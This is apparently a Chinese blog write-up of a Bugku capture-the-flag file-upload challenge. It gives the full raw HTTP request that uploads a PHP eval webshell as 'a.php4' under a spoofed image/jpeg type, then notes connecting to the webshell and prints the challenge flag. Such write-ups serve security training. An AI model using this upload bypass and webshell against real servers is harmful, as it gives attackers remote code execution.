首页 > 其他分享 >bugku_文件上传_wp

bugku_文件上传_wp

时间:2023-08-02 16:45:21浏览次数:42  
标签:WebKitFormBoundary3SANfAz2ktcltLar bugku 175.224 image Content wp ------ 上传

bugku_文件上传

image

payload

点击查看payload 
POST /index.php HTTP/1.1
Host: 114.67.175.224:16103
Content-Length: 308
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.67.175.224:16103
Content-Type: Multipart/form-data; boundary=----WebKitFormBoundary3SANfAz2ktcltLar
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://114.67.175.224:16103/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: b-user-id=0981d09e-3f00-f009-a1f8-41d13a3b41c8
Connection: close

------WebKitFormBoundary3SANfAz2ktcltLar
Content-Disposition: form-data; name="file"; filename="a.php4"
Content-Type: image/jpeg

<?php @eval($_POST['cmd']);?>
------WebKitFormBoundary3SANfAz2ktcltLar
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundary3SANfAz2ktcltLar--

请求包

image

响应包

image

连接webshell

image

flag

image

flag{9c33d57fd6c285e4bf6f9263d580ee36}

标签:WebKitFormBoundary3SANfAz2ktcltLar,bugku,175.224,image,Content,wp,------,上传
From: https://www.cnblogs.com/zy4024/p/bugku_web.html

相关文章

  • js上传文件到服务器指定文件夹问题
    ​ 一、概述 所谓断点续传,其实只是指下载,也就是要从文件已经下载的地方开始继续下载。在以前版本的HTTP协议是不支持断点的,HTTP/1.1开始就支持了。一般断点下载时才用到Range和Content-Range实体头。HTTP协议本身不支持断点上传,需要自己实现。 二、Range  用于请求头......
  • csharp上传文件到服务器指定文件夹问题
    ​ 以ASP.NETCoreWebAPI 作后端 API ,用 Vue 构建前端页面,用 Axios 从前端访问后端 API,包括文件的上传和下载。 准备文件上传的API #region 文件上传  可以带参数        [HttpPost("upload")]        publicJsonResultuploadProject(I......
  • git如何上传本地代码文件到git仓库【图文详解】
    第一步:新建代码库第二步:复制仓库地址第三步:在本地文件夹内右击,通过GitBashHere进入命令窗口,克隆复制的仓库地址    第四步:将你的项目添加至该文件夹下,通过命令进行添加至仓库主要命令1:gitinit(初始化仓库)2:gitadd.(这里的.表示添加所有文......
  • c#上传文件到服务器指定文件夹问题
    ​ IE的自带下载功能中没有断点续传功能,要实现断点续传功能,需要用到HTTP协议中鲜为人知的几个响应头和请求头。 一. 两个必要响应头Accept-Ranges、ETag        客户端每次提交下载请求时,服务端都要添加这两个响应头,以保证客户端和服务端将此下载识别为可以断点续......
  • docker 安装 bage私有nuget服务器并上传nuget包
    下载镜像dockerpullloicsharma/baget创建映射文件夹mkdir/data\mkdir/data/app\mkdir/data/app/bagetmkdir/data/app/baget/baget-data 写入配置文件baget.envecho"#以下配置是用于发布包的API密钥,您应该将其更改ApiKey的值以保护服务器。ApiKey=Nuge......
  • jsp上传文件到服务器指定文件夹问题
    ​ javaweb上传文件上传文件的jsp中的部分上传文件同样可以使用form表单向后端发请求,也可以使用ajax向后端发请求    1.通过form表单向后端发送请求         <formid="postForm"action="${pageContext.request.contextPath}/UploadServlet"method="post"e......
  • [SWPUCTF 2021 新生赛]ez_unserialize
    [SWPUCTF2021新生赛]ez_unserialize题目来源:nssctf题目类型:web涉及考点:PHP反序列化1.检查一下源代码,发现Disallow:猜测大概有robots.txt,扫下后台看看:额,flag.php都扫出来了,但是进不去,还是老老实实看robots吧:2.看到题目了,开始代码审计<?phperror_reporting(0);show_......
  • 考研数据结构——每日一题[WPL]
    3766.二叉树的带权路径长度二叉树的带权路径长度(WPL)是二叉树中所有叶结点的带权路径长度之和,也就是每个叶结点的深度与权值之积的总和。给定一棵二叉树T,请你计算并输出它的WPL。注意,根节点的深度为0。样例输入:二叉树[8,12,2,null,null,6,4,null,null,null,nul......
  • 如何在Windows上将iOS应用上传到App Store
     ApplicationUploaderiOSApp上架工具是一款非常好用的针对iOS苹果应用程序软件开发的实用编程工具,它的主要作用是帮助用户进行快速的程序应用设计和程序应用调试,节省用户进行软件开发耗费的不必要时间!​编辑切换为居中添加图片注释,不超过140字(可选......
  • 淘宝店铺订单交易接口/淘宝店铺商品上传接口/淘宝店铺订单解密接口/淘宝店铺订单明文
    淘宝店铺订单交易接口/淘宝店铺商品上传接口/淘宝店铺订单解密接口/淘宝店铺订单明文接口/淘宝店铺订单插旗接口代码对接分享如下:1.公共参数名称类型必须描述(接口代码交流wx:19970108018,Q:1597063760)keyString是调用key(必须以GET方式拼接在URLsecretString是调用密钥api_nameStr......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99